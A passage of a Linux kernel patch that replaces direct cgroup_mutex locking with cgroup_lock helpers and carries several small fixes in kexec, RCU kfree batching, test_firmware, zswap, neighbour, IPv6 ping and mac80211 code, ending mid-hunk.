+diff --git a/kernel/bpf/cgroup.c b/kernel/bpf/cgroup.c
+index 819f011f0a9cd..b86b907e566ca 100644
+--- a/kernel/bpf/cgroup.c
++++ b/kernel/bpf/cgroup.c
+@@ -173,11 +173,11 @@ void bpf_cgroup_atype_put(int cgroup_atype)
+ {
+ 	int i = cgroup_atype - CGROUP_LSM_START;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	if (--cgroup_lsm_atype[i].refcnt <= 0)
+ 		cgroup_lsm_atype[i].attach_btf_id = 0;
+ 	WARN_ON_ONCE(cgroup_lsm_atype[i].refcnt < 0);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ }
+ #else
+ static enum cgroup_bpf_attach_type
+@@ -282,7 +282,7 @@ static void cgroup_bpf_release(struct work_struct *work)
+ 
+ 	unsigned int atype;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	for (atype = 0; atype < ARRAY_SIZE(cgrp->bpf.progs); atype++) {
+ 		struct hlist_head *progs = &cgrp->bpf.progs[atype];
+@@ -315,7 +315,7 @@ static void cgroup_bpf_release(struct work_struct *work)
+ 		bpf_cgroup_storage_free(storage);
+ 	}
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	for (p = cgroup_parent(cgrp); p; p = cgroup_parent(p))
+ 		cgroup_bpf_put(p);
+@@ -729,9 +729,9 @@ static int cgroup_bpf_attach(struct cgroup *cgrp,
+ {
+ 	int ret;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	ret = __cgroup_bpf_attach(cgrp, prog, replace_prog, link, type, flags);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	return ret;
+ }
+ 
+@@ -831,7 +831,7 @@ static int cgroup_bpf_replace(struct bpf_link *link, struct bpf_prog *new_prog,
+ 
+ 	cg_link = container_of(link, struct bpf_cgroup_link, link);
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	/* link might have been auto-released by dying cgroup, so fail */
+ 	if (!cg_link->cgroup) {
+ 		ret = -ENOLINK;
+@@ -843,7 +843,7 @@ static int cgroup_bpf_replace(struct bpf_link *link, struct bpf_prog *new_prog,
+ 	}
+ 	ret = __cgroup_bpf_replace(cg_link->cgroup, cg_link, new_prog);
+ out_unlock:
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	return ret;
+ }
+ 
+@@ -1009,9 +1009,9 @@ static int cgroup_bpf_detach(struct cgroup *cgrp, struct bpf_prog *prog,
+ {
+ 	int ret;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	ret = __cgroup_bpf_detach(cgrp, prog, NULL, type);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	return ret;
+ }
+ 
+@@ -1120,9 +1120,9 @@ static int cgroup_bpf_query(struct cgroup *cgrp, const union bpf_attr *attr,
+ {
+ 	int ret;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	ret = __cgroup_bpf_query(cgrp, attr, uattr);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	return ret;
+ }
+ 
+@@ -1189,11 +1189,11 @@ static void bpf_cgroup_link_release(struct bpf_link *link)
+ 	if (!cg_link->cgroup)
+ 		return;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	/* re-check cgroup under lock again */
+ 	if (!cg_link->cgroup) {
+-		mutex_unlock(&cgroup_mutex);
++		cgroup_unlock();
+ 		return;
+ 	}
+ 
+@@ -1205,7 +1205,7 @@ static void bpf_cgroup_link_release(struct bpf_link *link)
+ 	cg = cg_link->cgroup;
+ 	cg_link->cgroup = NULL;
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	cgroup_put(cg);
+ }
+@@ -1232,10 +1232,10 @@ static void bpf_cgroup_link_show_fdinfo(const struct bpf_link *link,
+ 		container_of(link, struct bpf_cgroup_link, link);
+ 	u64 cg_id = 0;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	if (cg_link->cgroup)
+ 		cg_id = cgroup_id(cg_link->cgroup);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	seq_printf(seq,
+ 		   "cgroup_id:\t%llu\n"
+@@ -1251,10 +1251,10 @@ static int bpf_cgroup_link_fill_link_info(const struct bpf_link *link,
+ 		container_of(link, struct bpf_cgroup_link, link);
+ 	u64 cg_id = 0;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	if (cg_link->cgroup)
+ 		cg_id = cgroup_id(cg_link->cgroup);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	info->cgroup.cgroup_id = cg_id;
+ 	info->cgroup.attach_type = cg_link->type;
+diff --git a/kernel/bpf/cgroup_iter.c b/kernel/bpf/cgroup_iter.c
+index c187a9e62bdbb..d57ccb02477f8 100644
+--- a/kernel/bpf/cgroup_iter.c
++++ b/kernel/bpf/cgroup_iter.c
+@@ -58,7 +58,7 @@ static void *cgroup_iter_seq_start(struct seq_file *seq, loff_t *pos)
+ {
+ 	struct cgroup_iter_priv *p = seq->private;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	/* cgroup_iter doesn't support read across multiple sessions. */
+ 	if (*pos > 0) {
+@@ -89,7 +89,7 @@ static void cgroup_iter_seq_stop(struct seq_file *seq, void *v)
+ {
+ 	struct cgroup_iter_priv *p = seq->private;
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	/* pass NULL to the prog for post-processing */
+ 	if (!v) {
+diff --git a/kernel/bpf/local_storage.c b/kernel/bpf/local_storage.c
+index 098cf336fae6e..f01ca6f1ee031 100644
+--- a/kernel/bpf/local_storage.c
++++ b/kernel/bpf/local_storage.c
+@@ -333,14 +333,14 @@ static void cgroup_storage_map_free(struct bpf_map *_map)
+ 	struct list_head *storages = &map->list;
+ 	struct bpf_cgroup_storage *storage, *stmp;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	list_for_each_entry_safe(storage, stmp, storages, list_map) {
+ 		bpf_cgroup_storage_unlink(storage);
+ 		bpf_cgroup_storage_free(storage);
+ 	}
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	WARN_ON(!RB_EMPTY_ROOT(&map->root));
+ 	WARN_ON(!list_empty(&map->list));
+diff --git a/kernel/cgroup/cgroup-v1.c b/kernel/cgroup/cgroup-v1.c
+index 52bb5a74a23b9..5407241dbb45f 100644
+--- a/kernel/cgroup/cgroup-v1.c
++++ b/kernel/cgroup/cgroup-v1.c
+@@ -58,7 +58,7 @@ int cgroup_attach_task_all(struct task_struct *from, struct task_struct *tsk)
+ 	struct cgroup_root *root;
+ 	int retval = 0;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	cgroup_attach_lock(true);
+ 	for_each_root(root) {
+ 		struct cgroup *from_cgrp;
+@@ -72,7 +72,7 @@ int cgroup_attach_task_all(struct task_struct *from, struct task_struct *tsk)
+ 			break;
+ 	}
+ 	cgroup_attach_unlock(true);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	return retval;
+ }
+@@ -106,9 +106,9 @@ int cgroup_transfer_tasks(struct cgroup *to, struct cgroup *from)
+ 	if (ret)
+ 		return ret;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+-	percpu_down_write(&cgroup_threadgroup_rwsem);
++	cgroup_attach_lock(true);
+ 
+ 	/* all tasks in @from are being moved, all csets are source */
+ 	spin_lock_irq(&css_set_lock);
+@@ -144,8 +144,8 @@ int cgroup_transfer_tasks(struct cgroup *to, struct cgroup *from)
+ 	} while (task && !ret);
+ out_err:
+ 	cgroup_migrate_finish(&mgctx);
+-	percpu_up_write(&cgroup_threadgroup_rwsem);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_attach_unlock(true);
++	cgroup_unlock();
+ 	return ret;
+ }
+ 
+@@ -847,13 +847,13 @@ static int cgroup1_rename(struct kernfs_node *kn, struct kernfs_node *new_parent
+ 	kernfs_break_active_protection(new_parent);
+ 	kernfs_break_active_protection(kn);
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	ret = kernfs_rename(kn, new_parent, new_name_str);
+ 	if (!ret)
+ 		TRACE_CGROUP_PATH(rename, cgrp);
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	kernfs_unbreak_active_protection(kn);
+ 	kernfs_unbreak_active_protection(new_parent);
+@@ -1119,7 +1119,7 @@ int cgroup1_reconfigure(struct fs_context *fc)
+ 	trace_cgroup_remount(root);
+ 
+  out_unlock:
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	return ret;
+ }
+ 
+@@ -1246,7 +1246,7 @@ int cgroup1_get_tree(struct fs_context *fc)
+ 	if (!ret && !percpu_ref_tryget_live(&ctx->root->cgrp.self.refcnt))
+ 		ret = 1;	/* restart */
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	if (!ret)
+ 		ret = cgroup_do_get_tree(fc);
+diff --git a/kernel/cgroup/cgroup.c b/kernel/cgroup/cgroup.c
+index 2319946715e0c..36c95626afecc 100644
+--- a/kernel/cgroup/cgroup.c
++++ b/kernel/cgroup/cgroup.c
+@@ -1385,7 +1385,7 @@ static void cgroup_destroy_root(struct cgroup_root *root)
+ 	cgroup_favor_dynmods(root, false);
+ 	cgroup_exit_root_id(root);
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	cgroup_rstat_exit(cgrp);
+ 	kernfs_destroy_root(root->kf_root);
+@@ -1619,7 +1619,7 @@ void cgroup_kn_unlock(struct kernfs_node *kn)
+ 	else
+ 		cgrp = kn->parent->priv;
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	kernfs_unbreak_active_protection(kn);
+ 	cgroup_put(cgrp);
+@@ -1664,7 +1664,7 @@ struct cgroup *cgroup_kn_lock_live(struct kernfs_node *kn, bool drain_offline)
+ 	if (drain_offline)
+ 		cgroup_lock_and_drain_offline(cgrp);
+ 	else
+-		mutex_lock(&cgroup_mutex);
++		cgroup_lock();
+ 
+ 	if (!cgroup_is_dead(cgrp))
+ 		return cgrp;
+@@ -2161,13 +2161,13 @@ int cgroup_do_get_tree(struct fs_context *fc)
+ 		struct super_block *sb = fc->root->d_sb;
+ 		struct cgroup *cgrp;
+ 
+-		mutex_lock(&cgroup_mutex);
++		cgroup_lock();
+ 		spin_lock_irq(&css_set_lock);
+ 
+ 		cgrp = cset_cgroup_from_root(ctx->ns->root_cset, ctx->root);
+ 
+ 		spin_unlock_irq(&css_set_lock);
+-		mutex_unlock(&cgroup_mutex);
++		cgroup_unlock();
+ 
+ 		nsdentry = kernfs_node_dentry(cgrp->kn, sb);
+ 		dput(fc->root);
+@@ -2350,13 +2350,13 @@ int cgroup_path_ns(struct cgroup *cgrp, char *buf, size_t buflen,
+ {
+ 	int ret;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	spin_lock_irq(&css_set_lock);
+ 
+ 	ret = cgroup_path_ns_locked(cgrp, buf, buflen, ns);
+ 
+ 	spin_unlock_irq(&css_set_lock);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	return ret;
+ }
+@@ -2382,7 +2382,7 @@ int task_cgroup_path(struct task_struct *task, char *buf, size_t buflen)
+ 	int hierarchy_id = 1;
+ 	int ret;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	spin_lock_irq(&css_set_lock);
+ 
+ 	root = idr_get_next(&cgroup_hierarchy_idr, &hierarchy_id);
+@@ -2396,7 +2396,7 @@ int task_cgroup_path(struct task_struct *task, char *buf, size_t buflen)
+ 	}
+ 
+ 	spin_unlock_irq(&css_set_lock);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(task_cgroup_path);
+@@ -3107,7 +3107,7 @@ void cgroup_lock_and_drain_offline(struct cgroup *cgrp)
+ 	int ssid;
+ 
+ restart:
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	cgroup_for_each_live_descendant_post(dsct, d_css, cgrp) {
+ 		for_each_subsys(ss, ssid) {
+@@ -3121,7 +3121,7 @@ restart:
+ 			prepare_to_wait(&dsct->offline_waitq, &wait,
+ 					TASK_UNINTERRUPTIBLE);
+ 
+-			mutex_unlock(&cgroup_mutex);
++			cgroup_unlock();
+ 			schedule();
+ 			finish_wait(&dsct->offline_waitq, &wait);
+ 
+@@ -4370,9 +4370,9 @@ int cgroup_rm_cftypes(struct cftype *cfts)
+ 	if (!(cfts[0].flags & __CFTYPE_ADDED))
+ 		return -ENOENT;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	ret = cgroup_rm_cftypes_locked(cfts);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	return ret;
+ }
+ 
+@@ -4404,14 +4404,14 @@ static int cgroup_add_cftypes(struct cgroup_subsys *ss, struct cftype *cfts)
+ 	if (ret)
+ 		return ret;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	list_add_tail(&cfts->node, &ss->cfts);
+ 	ret = cgroup_apply_cftypes(cfts, true);
+ 	if (ret)
+ 		cgroup_rm_cftypes_locked(cfts);
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	return ret;
+ }
+ 
+@@ -5380,7 +5380,7 @@ static void css_release_work_fn(struct work_struct *work)
+ 	struct cgroup_subsys *ss = css->ss;
+ 	struct cgroup *cgrp = css->cgroup;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	css->flags |= CSS_RELEASED;
+ 	list_del_rcu(&css->sibling);
+@@ -5421,7 +5421,7 @@ static void css_release_work_fn(struct work_struct *work)
+ 					 NULL);
+ 	}
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	INIT_RCU_WORK(&css->destroy_rwork, css_free_rwork_fn);
+ 	queue_rcu_work(cgroup_destroy_wq, &css->destroy_rwork);
+@@ -5769,7 +5769,7 @@ static void css_killed_work_fn(struct work_struct *work)
+ 	struct cgroup_subsys_state *css =
+ 		container_of(work, struct cgroup_subsys_state, destroy_work);
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	do {
+ 		offline_css(css);
+@@ -5778,7 +5778,7 @@ static void css_killed_work_fn(struct work_struct *work)
+ 		css = css->parent;
+ 	} while (css && atomic_dec_and_test(&css->online_cnt));
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ }
+ 
+ /* css kill confirmation processing requires process context, bounce */
+@@ -5962,7 +5962,7 @@ static void __init cgroup_init_subsys(struct cgroup_subsys *ss, bool early)
+ 
+ 	pr_debug("Initializing cgroup subsys %s\n", ss->name);
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	idr_init(&ss->css_idr);
+ 	INIT_LIST_HEAD(&ss->cfts);
+@@ -6006,7 +6006,7 @@ static void __init cgroup_init_subsys(struct cgroup_subsys *ss, bool early)
+ 
+ 	BUG_ON(online_css(css));
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ }
+ 
+ /**
+@@ -6066,7 +6066,7 @@ int __init cgroup_init(void)
+ 
+ 	get_user_ns(init_cgroup_ns.user_ns);
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	/*
+ 	 * Add init_css_set to the hash table so that dfl_root can link to
+@@ -6077,7 +6077,7 @@ int __init cgroup_init(void)
+ 
+ 	BUG_ON(cgroup_setup_root(&cgrp_dfl_root, 0));
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	for_each_subsys(ss, ssid) {
+ 		if (ss->early_init) {
+@@ -6129,9 +6129,9 @@ int __init cgroup_init(void)
+ 		if (ss->bind)
+ 			ss->bind(init_css_set.subsys[ssid]);
+ 
+-		mutex_lock(&cgroup_mutex);
++		cgroup_lock();
+ 		css_populate_dir(init_css_set.subsys[ssid]);
+-		mutex_unlock(&cgroup_mutex);
++		cgroup_unlock();
+ 	}
+ 
+ 	/* init_css_set.subsys[] has been updated, re-hash */
+@@ -6236,7 +6236,7 @@ int proc_cgroup_show(struct seq_file *m, struct pid_namespace *ns,
+ 	if (!buf)
+ 		goto out;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	spin_lock_irq(&css_set_lock);
+ 
+ 	for_each_root(root) {
+@@ -6291,7 +6291,7 @@ int proc_cgroup_show(struct seq_file *m, struct pid_namespace *ns,
+ 	retval = 0;
+ out_unlock:
+ 	spin_unlock_irq(&css_set_lock);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	kfree(buf);
+ out:
+ 	return retval;
+@@ -6375,7 +6375,7 @@ static int cgroup_css_set_fork(struct kernel_clone_args *kargs)
+ 	struct file *f;
+ 
+ 	if (kargs->flags & CLONE_INTO_CGROUP)
+-		mutex_lock(&cgroup_mutex);
++		cgroup_lock();
+ 
+ 	cgroup_threadgroup_change_begin(current);
+ 
+@@ -6450,7 +6450,7 @@ static int cgroup_css_set_fork(struct kernel_clone_args *kargs)
+ 
+ err:
+ 	cgroup_threadgroup_change_end(current);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	if (f)
+ 		fput(f);
+ 	if (dst_cgrp)
+@@ -6471,19 +6471,18 @@ err:
+ static void cgroup_css_set_put_fork(struct kernel_clone_args *kargs)
+ 	__releases(&cgroup_threadgroup_rwsem) __releases(&cgroup_mutex)
+ {
+-	cgroup_threadgroup_change_end(current);
+-
+-	if (kargs->flags & CLONE_INTO_CGROUP) {
+-		struct cgroup *cgrp = kargs->cgrp;
+-		struct css_set *cset = kargs->cset;
++	struct cgroup *cgrp = kargs->cgrp;
++	struct css_set *cset = kargs->cset;
+ 
+-		mutex_unlock(&cgroup_mutex);
++	cgroup_threadgroup_change_end(current);
+ 
+-		if (cset) {
+-			put_css_set(cset);
+-			kargs->cset = NULL;
+-		}
++	if (cset) {
++		put_css_set(cset);
++		kargs->cset = NULL;
++	}
+ 
++	if (kargs->flags & CLONE_INTO_CGROUP) {
++		cgroup_unlock();
+ 		if (cgrp) {
+ 			cgroup_put(cgrp);
+ 			kargs->cgrp = NULL;
+diff --git a/kernel/kexec_file.c b/kernel/kexec_file.c
+index 45637511e0de6..6d787ae9deca0 100644
+--- a/kernel/kexec_file.c
++++ b/kernel/kexec_file.c
+@@ -898,10 +898,22 @@ static int kexec_purgatory_setup_sechdrs(struct purgatory_info *pi,
+ 		}
+ 
+ 		offset = ALIGN(offset, align);
++
++		/*
++		 * Check if the segment contains the entry point, if so,
++		 * calculate the value of image->start based on it.
++		 * If the compiler has produced more than one .text section
++		 * (Eg: .text.hot), they are generally after the main .text
++		 * section, and they shall not be used to calculate
++		 * image->start. So do not re-calculate image->start if it
++		 * is not set to the initial value, and warn the user so they
++		 * have a chance to fix their purgatory's linker script.
++		 */
+ 		if (sechdrs[i].sh_flags & SHF_EXECINSTR &&
+ 		    pi->ehdr->e_entry >= sechdrs[i].sh_addr &&
+ 		    pi->ehdr->e_entry < (sechdrs[i].sh_addr
+-					 + sechdrs[i].sh_size)) {
++					 + sechdrs[i].sh_size) &&
++		    !WARN_ON(kbuf->image->start != pi->ehdr->e_entry)) {
+ 			kbuf->image->start -= sechdrs[i].sh_addr;
+ 			kbuf->image->start += kbuf->mem + offset;
+ 		}
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index ce34ca0b5b985..d03122f90cc48 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -3099,6 +3099,18 @@ need_offload_krc(struct kfree_rcu_cpu *krcp)
+ 	return !!krcp->head;
+ }
+ 
++static bool
++need_wait_for_krwp_work(struct kfree_rcu_cpu_work *krwp)
++{
++	int i;
++
++	for (i = 0; i < FREE_N_CHANNELS; i++)
++		if (krwp->bkvhead_free[i])
++			return true;
++
++	return !!krwp->head_free;
++}
++
+ static void
+ schedule_delayed_monitor_work(struct kfree_rcu_cpu *krcp)
+ {
+@@ -3130,14 +3142,13 @@ static void kfree_rcu_monitor(struct work_struct *work)
+ 	for (i = 0; i < KFREE_N_BATCHES; i++) {
+ 		struct kfree_rcu_cpu_work *krwp = &(krcp->krw_arr[i]);
+ 
+-		// Try to detach bkvhead or head and attach it over any
+-		// available corresponding free channel. It can be that
+-		// a previous RCU batch is in progress, it means that
+-		// immediately to queue another one is not possible so
+-		// in that case the monitor work is rearmed.
+-		if ((krcp->bkvhead[0] && !krwp->bkvhead_free[0]) ||
+-			(krcp->bkvhead[1] && !krwp->bkvhead_free[1]) ||
+-				(krcp->head && !krwp->head_free)) {
++		// Try to detach bulk_head or head and attach it, only when
++		// all channels are free.  Any channel is not free means at krwp
++		// there is on-going rcu work to handle krwp's free business.
++		if (need_wait_for_krwp_work(krwp))
++			continue;
++
++		if (need_offload_krc(krcp)) {
+ 			// Channel 1 corresponds to the SLAB-pointer bulk path.
+ 			// Channel 2 corresponds to vmalloc-pointer bulk path.
+ 			for (j = 0; j < FREE_N_CHANNELS; j++) {
+diff --git a/lib/test_firmware.c b/lib/test_firmware.c
+index 7f165c517338a..13d3fa6aa972c 100644
+--- a/lib/test_firmware.c
++++ b/lib/test_firmware.c
+@@ -22,6 +22,7 @@
+ #include <linux/slab.h>
+ #include <linux/uaccess.h>
+ #include <linux/delay.h>
++#include <linux/kstrtox.h>
+ #include <linux/kthread.h>
+ #include <linux/vmalloc.h>
+ #include <linux/efi_embedded_fw.h>
+@@ -359,16 +360,26 @@ static ssize_t config_test_show_str(char *dst,
+ 	return len;
+ }
+ 
+-static int test_dev_config_update_bool(const char *buf, size_t size,
++static inline int __test_dev_config_update_bool(const char *buf, size_t size,
+ 				       bool *cfg)
+ {
+ 	int ret;
+ 
+-	mutex_lock(&test_fw_mutex);
+-	if (strtobool(buf, cfg) < 0)
++	if (kstrtobool(buf, cfg) < 0)
+ 		ret = -EINVAL;
+ 	else
+ 		ret = size;
++
++	return ret;
++}
++
++static int test_dev_config_update_bool(const char *buf, size_t size,
++				       bool *cfg)
++{
++	int ret;
++
++	mutex_lock(&test_fw_mutex);
++	ret = __test_dev_config_update_bool(buf, size, cfg);
+ 	mutex_unlock(&test_fw_mutex);
+ 
+ 	return ret;
+@@ -379,7 +390,8 @@ static ssize_t test_dev_config_show_bool(char *buf, bool val)
+ 	return snprintf(buf, PAGE_SIZE, "%d\n", val);
+ }
+ 
+-static int test_dev_config_update_size_t(const char *buf,
++static int __test_dev_config_update_size_t(
++					 const char *buf,
+ 					 size_t size,
+ 					 size_t *cfg)
+ {
+@@ -390,9 +402,7 @@ static int test_dev_config_update_size_t(const char *buf,
+ 	if (ret)
+ 		return ret;
+ 
+-	mutex_lock(&test_fw_mutex);
+ 	*(size_t *)cfg = new;
+-	mutex_unlock(&test_fw_mutex);
+ 
+ 	/* Always return full write size even if we didn't consume all */
+ 	return size;
+@@ -408,7 +418,7 @@ static ssize_t test_dev_config_show_int(char *buf, int val)
+ 	return snprintf(buf, PAGE_SIZE, "%d\n", val);
+ }
+ 
+-static int test_dev_config_update_u8(const char *buf, size_t size, u8 *cfg)
++static int __test_dev_config_update_u8(const char *buf, size_t size, u8 *cfg)
+ {
+ 	u8 val;
+ 	int ret;
+@@ -417,14 +427,23 @@ static int test_dev_config_update_u8(const char *buf, size_t size, u8 *cfg)
+ 	if (ret)
+ 		return ret;
+ 
+-	mutex_lock(&test_fw_mutex);
+ 	*(u8 *)cfg = val;
+-	mutex_unlock(&test_fw_mutex);
+ 
+ 	/* Always return full write size even if we didn't consume all */
+ 	return size;
+ }
+ 
++static int test_dev_config_update_u8(const char *buf, size_t size, u8 *cfg)
++{
++	int ret;
++
++	mutex_lock(&test_fw_mutex);
++	ret = __test_dev_config_update_u8(buf, size, cfg);
++	mutex_unlock(&test_fw_mutex);
++
++	return ret;
++}
++
+ static ssize_t test_dev_config_show_u8(char *buf, u8 val)
+ {
+ 	return snprintf(buf, PAGE_SIZE, "%u\n", val);
+@@ -477,10 +496,10 @@ static ssize_t config_num_requests_store(struct device *dev,
+ 		mutex_unlock(&test_fw_mutex);
+ 		goto out;
+ 	}
+-	mutex_unlock(&test_fw_mutex);
+ 
+-	rc = test_dev_config_update_u8(buf, count,
+-				       &test_fw_config->num_requests);
++	rc = __test_dev_config_update_u8(buf, count,
++					 &test_fw_config->num_requests);
++	mutex_unlock(&test_fw_mutex);
+ 
+ out:
+ 	return rc;
+@@ -524,10 +543,10 @@ static ssize_t config_buf_size_store(struct device *dev,
+ 		mutex_unlock(&test_fw_mutex);
+ 		goto out;
+ 	}
+-	mutex_unlock(&test_fw_mutex);
+ 
+-	rc = test_dev_config_update_size_t(buf, count,
+-					   &test_fw_config->buf_size);
++	rc = __test_dev_config_update_size_t(buf, count,
++					     &test_fw_config->buf_size);
++	mutex_unlock(&test_fw_mutex);
+ 
+ out:
+ 	return rc;
+@@ -554,10 +573,10 @@ static ssize_t config_file_offset_store(struct device *dev,
+ 		mutex_unlock(&test_fw_mutex);
+ 		goto out;
+ 	}
+-	mutex_unlock(&test_fw_mutex);
+ 
+-	rc = test_dev_config_update_size_t(buf, count,
+-					   &test_fw_config->file_offset);
++	rc = __test_dev_config_update_size_t(buf, count,
++					     &test_fw_config->file_offset);
++	mutex_unlock(&test_fw_mutex);
+ 
+ out:
+ 	return rc;
+diff --git a/mm/zswap.c b/mm/zswap.c
+index 708b82dbe8a46..b3829ada4a413 100644
+--- a/mm/zswap.c
++++ b/mm/zswap.c
+@@ -1138,9 +1138,16 @@ static int zswap_frontswap_store(unsigned type, pgoff_t offset,
+ 		goto reject;
+ 	}
+ 
++	/*
++	 * XXX: zswap reclaim does not work with cgroups yet. Without a
++	 * cgroup-aware entry LRU, we will push out entries system-wide based on
++	 * local cgroup limits.
++	 */
+ 	objcg = get_obj_cgroup_from_page(page);
+-	if (objcg && !obj_cgroup_may_zswap(objcg))
+-		goto shrink;
++	if (objcg && !obj_cgroup_may_zswap(objcg)) {
++		ret = -ENOMEM;
++		goto reject;
++	}
+ 
+ 	/* reclaim space if needed */
+ 	if (zswap_is_full()) {
+diff --git a/net/core/neighbour.c b/net/core/neighbour.c
+index bf081f62ae58b..6c0f2149f2c72 100644
+--- a/net/core/neighbour.c
++++ b/net/core/neighbour.c
+@@ -627,37 +627,6 @@ struct neighbour *neigh_lookup(struct neigh_table *tbl, const void *pkey,
+ }
+ EXPORT_SYMBOL(neigh_lookup);
+ 
+-struct neighbour *neigh_lookup_nodev(struct neigh_table *tbl, struct net *net,
+-				     const void *pkey)
+-{
+-	struct neighbour *n;
+-	unsigned int key_len = tbl->key_len;
+-	u32 hash_val;
+-	struct neigh_hash_table *nht;
+-
+-	NEIGH_CACHE_STAT_INC(tbl, lookups);
+-
+-	rcu_read_lock_bh();
+-	nht = rcu_dereference_bh(tbl->nht);
+-	hash_val = tbl->hash(pkey, NULL, nht->hash_rnd) >> (32 - nht->hash_shift);
+-
+-	for (n = rcu_dereference_bh(nht->hash_buckets[hash_val]);
+-	     n != NULL;
+-	     n = rcu_dereference_bh(n->next)) {
+-		if (!memcmp(n->primary_key, pkey, key_len) &&
+-		    net_eq(dev_net(n->dev), net)) {
+-			if (!refcount_inc_not_zero(&n->refcnt))
+-				n = NULL;
+-			NEIGH_CACHE_STAT_INC(tbl, hits);
+-			break;
+-		}
+-	}
+-
+-	rcu_read_unlock_bh();
+-	return n;
+-}
+-EXPORT_SYMBOL(neigh_lookup_nodev);
+-
+ static struct neighbour *
+ ___neigh_create(struct neigh_table *tbl, const void *pkey,
+ 		struct net_device *dev, u32 flags,
+diff --git a/net/ipv6/ping.c b/net/ipv6/ping.c
+index 808983bc2ec9f..4651aaf70db4f 100644
+--- a/net/ipv6/ping.c
++++ b/net/ipv6/ping.c
+@@ -114,7 +114,8 @@ static int ping_v6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	addr_type = ipv6_addr_type(daddr);
+ 	if ((__ipv6_addr_needs_scope_id(addr_type) && !oif) ||
+ 	    (addr_type & IPV6_ADDR_MAPPED) ||
+-	    (oif && sk->sk_bound_dev_if && oif != sk->sk_bound_dev_if))
++	    (oif && sk->sk_bound_dev_if && oif != sk->sk_bound_dev_if &&
++	     l3mdev_master_ifindex_by_index(sock_net(sk), oif) != sk->sk_bound_dev_if))
+ 		return -EINVAL;
+ 
+ 	ipcm6_init_sk(&ipc6, np);
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 06b9df2fbcd77..23a44edcb11f7 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -4732,11 +4732,16 @@ static int ieee80211_add_intf_link(struct wiphy *wiphy,
+ 				   unsigned int link_id)
+ {
+ 	struct ieee80211_sub_if_data *sdata = IEEE80211_WDEV_TO_SUB_IF(wdev);
++	int res;
+ 
+ 	if (wdev->use_4addr)
+ 		return -EOPNOTSUPP;
+ 
+-	return ieee80211_vif_set_links(sdata, wdev->valid_links);
++	mutex_lock(&sdata->local->mtx);
